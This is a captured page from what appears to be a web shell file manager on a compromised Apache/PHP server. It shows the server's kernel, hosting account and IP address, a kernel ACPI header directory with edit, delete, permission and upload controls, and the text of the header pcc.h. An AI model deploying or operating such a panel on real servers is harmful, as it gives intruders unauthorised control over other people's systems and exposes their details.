[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
acpi
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 platform
SET
[ DEL ]
📄 acbuffer.h
9,136 B
SET
[ EDIT ]
|
[ DEL ]
📄 acconfig.h
7,630 B
SET
[ EDIT ]
|
[ DEL ]
📄 acexcep.h
17,350 B
SET
[ EDIT ]
|
[ DEL ]
📄 acnames.h
2,238 B
SET
[ EDIT ]
|
[ DEL ]
📄 acoutput.h
16,758 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi.h
1,363 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_bus.h
23,169 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_drivers.h
3,652 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_io.h
723 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_lpat.h
1,583 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_numa.h
903 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpiosxf.h
11,619 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpixf.h
31,943 B
SET
[ EDIT ]
|
[ DEL ]
📄 acrestyp.h
19,972 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl.h
18,807 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl1.h
47,035 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl2.h
71,146 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl3.h
22,526 B
SET
[ EDIT ]
|
[ DEL ]
📄 actypes.h
43,204 B
SET
[ EDIT ]
|
[ DEL ]
📄 acuuid.h
3,520 B
SET
[ EDIT ]
|
[ DEL ]
📄 apei.h
1,438 B
SET
[ EDIT ]
|
[ DEL ]
📄 battery.h
594 B
SET
[ EDIT ]
|
[ DEL ]
📄 button.h
401 B
SET
[ EDIT ]
|
[ DEL ]
📄 cppc_acpi.h
5,077 B
SET
[ EDIT ]
|
[ DEL ]
📄 ghes.h
3,485 B
SET
[ EDIT ]
|
[ DEL ]
📄 hed.h
371 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfit.h
351 B
SET
[ EDIT ]
|
[ DEL ]
📄 pcc.h
972 B
SET
[ EDIT ]
|
[ DEL ]
📄 pdc_intel.h
1,048 B
SET
[ EDIT ]
|
[ DEL ]
📄 processor.h
12,115 B
SET
[ EDIT ]
|
[ DEL ]
📄 reboot.h
201 B
SET
[ EDIT ]
|
[ DEL ]
📄 video.h
3,218 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: pcc.h
/* * PCC (Platform Communications Channel) methods * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; version 2 * of the License. */ #ifndef _PCC_H #define _PCC_H #include <linux/mailbox_controller.h> #include <linux/mailbox_client.h> struct pcc_mbox_chan { struct mbox_chan *mchan; u64 shmem_base_addr; u64 shmem_size; u32 latency; u32 max_access_rate; u16 min_turnaround_time; }; #define MAX_PCC_SUBSPACES 256 #ifdef CONFIG_PCC extern struct pcc_mbox_chan * pcc_mbox_request_channel(struct mbox_client *cl, int subspace_id); extern void pcc_mbox_free_channel(struct pcc_mbox_chan *chan); #else static inline struct pcc_mbox_chan * pcc_mbox_request_channel(struct mbox_client *cl, int subspace_id) { return ERR_PTR(-ENODEV); } static inline void pcc_mbox_free_channel(struct pcc_mbox_chan *chan) { } #endif #endif /* _PCC_H */